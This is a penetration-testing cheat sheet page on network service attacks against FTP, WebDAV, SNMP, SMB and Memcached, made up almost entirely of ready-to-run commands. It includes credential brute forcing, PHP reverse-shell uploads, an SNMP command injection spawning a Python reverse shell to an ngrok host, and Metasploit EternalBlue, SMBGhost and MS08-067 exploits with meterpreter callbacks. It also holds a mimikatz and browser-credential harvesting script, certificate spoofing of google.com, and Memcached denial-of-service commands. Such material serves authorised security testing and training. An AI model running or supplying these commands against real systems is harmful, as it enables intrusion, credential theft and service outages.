Penetration Testing
  • Web
    • Reconnaissance
      • Search Engine Discovery
      • Fingerprint Web Server
      • Review Webserver Metafiles
      • Enumerate Applications
      • Review Webpage Content
      • Identify Application Entry Points
      • Map Execution Paths
      • Fingerprint Web Application Framework
      • Map Application Architecture
    • Open Source Intelligence
      • Infrastructure
      • People Investigation
    • Misconfiguration
      • Network Configuration
      • App Platform Configuration
      • File Extensions Handling
      • Review Old Backup
      • Enumerate Admin Interfaces
      • HTTP Methods
      • HTTP Strict Transport Security
      • RIA Cross Domain Policy
      • File Permission
      • Subdomain Takeover
      • Cloud Storage
      • Content Security Policy
      • Path Confusion
    • Identity Management
      • Role Definitions
      • User Registration
      • Account Provisioning
      • Account Enumeration
      • Weak Username Policy
    • Broken Authentication
      • Credentials Encrypted Channel
      • Default Credentials
      • Weak Lock Out Mechanism
      • Bypassing Authentication Schema
      • Vulnerable Remember Password
      • Browser Cache Weaknesses
      • Weak Password Policy
      • Weak Security Question Answer
      • Weak Password Reset Functionalities
      • Weaker Authentication in Alternative Channel
      • Multi-Factor Authentication
    • Broken Authorization
      • Directory Traversal File Include
      • Bypassing Authorization Schema
      • Privilege Escalation
      • Insecure Direct Object References
      • OAuth Weaknesses
    • Session Management
      • Session Management Schema
      • Cookies Attributes
      • Session Fixation
      • Exposed Session Variables
      • Cross Site Request Forgery
      • Logout Functionality
      • Session Timeout
      • Session Puzzling
      • Session Hijacking
      • JSON Web Tokens
    • Input Validation
      • Reflected Cross Site Scripting
      • Stored Cross Site Scripting
      • HTTP Verb Tampering
      • HTTP Parameter Pollution
      • SQL Injection
      • LDAP Injection
      • XML Injection
      • SSI Injection
      • XPath Injection
      • IMAP SMTP Injection
      • Code Injection
      • Command Injection
      • Insecure Deserialization
      • Format String Injection
      • Incubated Vulnerability
      • HTTP Splitting Smuggling
      • HTTP Incoming Requests
      • Host Header Injection
      • Server Side Template Injection
      • Server Side Request Forgery
      • Mass Assignment
      • Regular Expression DoS
      • PHP Type Juggling
    • Error Handling
      • Improper Error Handling
      • Stack Traces
    • Weak Cryptography
      • Weak Transport Layer Security
      • Padding Oracle Attack
      • Information Unencrypted Channel
      • Weak Encryption
    • Business Logic
      • Logic Data Validation
      • Ability to Forge Requests
      • Integrity Checks
      • Process Timing
      • Race Conditions
      • Circumvention of Work Flows
      • Defenses Against Application Misuse
      • Upload of Unexpected File Types
      • Upload of Malicious Files
      • Payment Functionality
    • Client Side
      • DOM-Based Cross Site Scripting
      • JavaScript Execution
      • HTML Injection
      • Client Side URL Redirect
      • CSS Injection
      • Client Side Resource Manipulation
      • Cross Origin Resource Sharing
      • Client Side Template Injection
      • Cross Site Flashing
      • Clickjacking
      • WebSockets
      • Web Messaging
      • Browser Storage
      • Cross Site Script Inclusion
      • Reverse Tabnabbing
    • API Attacks
      • Broken Object Level Authorization
      • Broken Authentication
      • Excessive Data Exposure
      • Lack of Resources and Rate Limiting
      • Broken Function Level Authorization
      • Mass Assignment
      • Security Misconfiguration
      • Injection Attack
      • Improper Assets Management
      • Insufficient Logging and Monitoring
  • Mobile
    • Mobile App Taxonomy
    • Mobile App Security Testing
    • General
    • Android
    • iOS
  • Cloud
    • Reconnaissance
    • SaaS
    • IaaS
    • Azure
    • AWS
    • GCP
    • IBM
    • Digital Ocean
    • Kubernetes
    • CI/CD
    • Active Directory
  • Network
    • Introduction
    • Intelligence Gathering
    • Vulnerability Analysis
    • Logical Vulnerabilities
    • Exploitation of Remote Services (User-Mode)
    • Exploitation of Remote Services (Kernel-Mode)
  • Wireless
    • Page 4
  • iot
    • Page 5
Powered by GitBook
On this page
  • Check List
  • Cheat Sheet
  • FTP
  • WebDAV
  • SNMP
  • SMB
  • Memcached

Was this helpful?

  1. Web
  2. Misconfiguration

Network Configuration

PreviousMisconfigurationNextApp Platform Configuration

Last updated 1 month ago

Was this helpful?

Check List

Cheat Sheet

FTP

Identify FTP

nmap -p 21 -sS -sV --mtu 5000 --script banner $WEBSITE

Anonymous Login

nmap -p 21 -sS -sV --mtu 5000 --script ftp-anon $WEBSITE

Brute Force

nmap -p 21 -sS -sV --mtu 5000 --script ftp-brute $WEBSITE

Browser Login

ftp://anonymous:anonymous@$TARGET

Download Files

wget --ftp-user=anonymous --ftp-password=anonymous ftp://$TARGET:21

CLI Login

ftp
open $TARGET 21

USER

> anonymous

PASS

> anonymous

FTP Mode

passive

Download File

get file.txt

Brute Force

hydra -V \
      -L /usr/share/seclists/Usernames/sap-default-usernames.txt \
      -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt ftp://$TARGET:21

Recon Version

msfconsole -qx "
    use auxiliary/scanner/ftp/ftp_version;
    set RHOSTS $WEBSITE;
    run;
    exit"

Anonymous Login

msfconsole -qx "
    use auxiliary/scanner/ftp/anonymous;
    set RHOSTS $WEBSITE;
    run;
    exit"

Brute Force

msfconsole -qx "
    use auxiliary/scanner/ftp/ftp_login;
    set RHOSTS $WEBSITE;
    set USERPASS_FILE /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt;
    run;
    exit"

WebDAV

Identify WebDAV

nmap -p 80,443 \
     -sS -sV --mtu 5000 \
     --script http-methods,http-webdav-scan $WEBSITE

Scan WebDAV

msfconsole -qx "
    use auxiliary/scanner/http/webdav_scanner;
    set PATH /webdav;
    set RHOSTS $WEBSITE;
    exit"

Brute Force

hydra -V \
      -L /usr/share/seclists/Usernames/sap-default-usernames.txt \
      -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt \
      $TARGET http-get /webdav/

Scan WebDAV

davtest -url $WEBSITE

Upload Shell

davtest -url $WEBSITE \
        -uploadfile /usr/share/webshells/php/php-reverse-shell.php \
        -uploadloc shell.php

Listening

nc -lvnp 1234
cadaver $WEBSITE/webdav

PUT Web shell

put /usr/share/webshells/php/php-reverse-shell.php

Listening

nc -lvnp 1234

SNMP

Identify SNMP

nmap -p 161 -sU -sV --mtu 5000 --script snmp-info $WEBSITE

Brute Force

nmap -p 161 -sU -sV --mtu 5000 --script snmp-brute $WEBSITE

Enumerate SNMP Public

snmpwalk -v1 -c public $TARGET

Enumerate SNMP Public

onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $TARGET

SNMPv1

snmpset -v1 -c private $TARGET OID s "unk9vvn"

SNMPv2

snmpset -v2c -c private $TARGET sysName.0 s "unk9vvn"

Start Ngrok

ngrok http 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')

Inject RCE

snmpset -m +NET-SNMP-EXTEND-MIB \
        -v 2c \
        -c SuP3RPrivCom90 $TARGET 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"$NGHOST\",443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'

Execute Command

snmpwalk -v2c -c SuP3RPrivCom90 $TARGET NET-SNMP-EXTEND-MIB::nsExtendObjects

Enumerate SNMP Public

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enum;
    set RHOSTS $WEBSITE;
    run;
    exit"

Enumerate SNMP Private

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enum;
    set RHOSTS $WEBSITE;
    set COMMUNITY private;
    run;
    exit"

Enumerate Windows Users

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enumusers;
    set RHOSTS $WEBSITE;
    run;
    exit"

Enumerate File Shares

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enumshares;
    set RHOSTS $WEBSITE;
    run;
    exit"

SMB

Identify SMB

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-protocols,smb-os-discovery,smb2-capabilities $WEBSITE

Recon Vulns

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-vuln-*,smb-double-pulsar-backdoor $WEBSITE

Brute Force

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-brute $WEBSITE

Enumerate Users and Shares

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-enum-users,smb-enum-shares $WEBSITE

Enumerate Domains and Groups

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-enum-domains,smb-enum-groups $WEBSITE

Enumerate Services and Processes

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-enum-services,smb-enum-processes $WEBSITE

Enum Host

netexec smb $TARGET

Enumerate Shares

enum4linux -a $TARGET

Enumerate Shares

nbtscan -r $TARGET/24

User Enumeration and Null Sessions

smbclient -N -L //$TARGET

User Enumeration and Null Sessions

rpcclient -U "" $TARGET

Detect Version

msfconsole -qx "
    use auxiliary/scanner/smb/smb_version;
    set RHOSTS $TARGET;
    run;
    exit"

Enumerate Users

msfconsole -qx "
    use auxiliary/scanner/smb/smb_enumusers;
    set RHOSTS $TARGET;
    run;
    exit"

Enumerate Shares

msfconsole -qx "
    use auxiliary/scanner/smb/smb_enumshares;
    set RHOSTS $TARGET;
    run;
    exit"

Credential Dumps

msfconsole -qx "
    use auxiliary/scanner/smb/impacket/secretsdump;
    set RHOSTS $TARGET;
    run;
    exit"

Credential Brute Force

msfconsole -qx "
    use auxiliary/scanner/smb/smb_login;
    set RHOSTS $TARGET;
    set SMBUser Administrator;
    set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top100.txt;
    run;
    exit"

Detect EternalBlue

msfconsole -qx "
    use auxiliary/scanner/smb/smb_ms17_010;
    set RHOSTS $TARGET;
    run;
    exit"

Start Ngrok

ngrok http 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')

Cert Spoof

rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
    use auxiliary/gather/impersonate_ssl;
    set RHOSTS google.com;
    run;
    exit"

Define ENV Cert

CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)

Post-EXP

cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF

EternalBlue Exploit (ÙŒWin 7 to 10 - Win Server 2008 to 2012)

msfconsole -qx "
    use exploit/windows/smb/ms17_010_eternalblue;
    set PAYLOAD windows/x64/meterpreter/reverse_https;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Doublepulsar Exploit (ÙŒWin 7 to 10 - Win Server 2008 to 2012)

msfconsole -qx "
    use exploit/windows/smb/smb_doublepulsar_rce;
    set PAYLOAD windows/x64/meterpreter/reverse_https;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

SMBGhost Exploit (Win 10)

msfconsole -qx "
    use exploit/windows/smb/cve_2020_0796_smbghost;
    set PAYLOAD windows/x64/meterpreter/reverse_https;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Net API Exploit (Win XP's)

msfconsole -qx "
    use exploit/windows/smb/ms08_067_netapi;
    set PAYLOAD windows/meterpreter/reverse_hop_http;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Memcached

Identify Memcached

nmap -p 11211 -sS -sV --mtu 5000 --script memcached-info $WEBSITE

Get Version

echo "version" | nc -vn -w 1 $TARGET 11211

Get Status

echo "stats" | nc -vn -w 1 $TARGET 11211

Get Slabs

echo "stats slabs" | nc -vn -w 1 $TARGET 11211

Get Items

echo "stats items" | nc -vn -w 1 $TARGET 11211

Get Key Names

echo "stats cachedump 1 10" | nc -vn -w 1 $TARGET 11211

Get Info Saved

echo "get $ITEM" | nc -vn -w 1 $TARGET 11211

Denial of Service

for i in {1..10000}; do echo "set key$i 0 0 1024" | nc $TARGET 11211; done

DDoS Amplification

echo -e "\x00\x00\x00\x00\x00\x01\x00\x00stats\n" | nc -u -q 1 $TARGET 11211

Get Stats

memcstat --servers=$TARGET

Get all items

memcdump --servers=$TARGET

Get info inside the item(s)

memccat --servers=$TARGET $ITEM1 $ITEM2 $ITEM3

Extract Slabs

msfconsole -qx "use auxiliary/gather/memcached_extractor;set RHOSTS $TARGET;run;exit"

Denial of Service

msfconsole -qx "use auxiliary/dos/misc/memcached;set RHOSTS $TARGET;run;exit"

Nmap
WGET
FTP
Hydra
Metasploit
Nmap
Metasploit
Hydra
DavTest
Cadaver
Nmap
SNMPWalk
Onesixtyone
SNMPSet
Metasploit
Nmap
netexec
enum4linux
nbtscan
smbclient
rpcclient
Metasploit
Nmap
Netcat
libmemcached-tools
Metasploit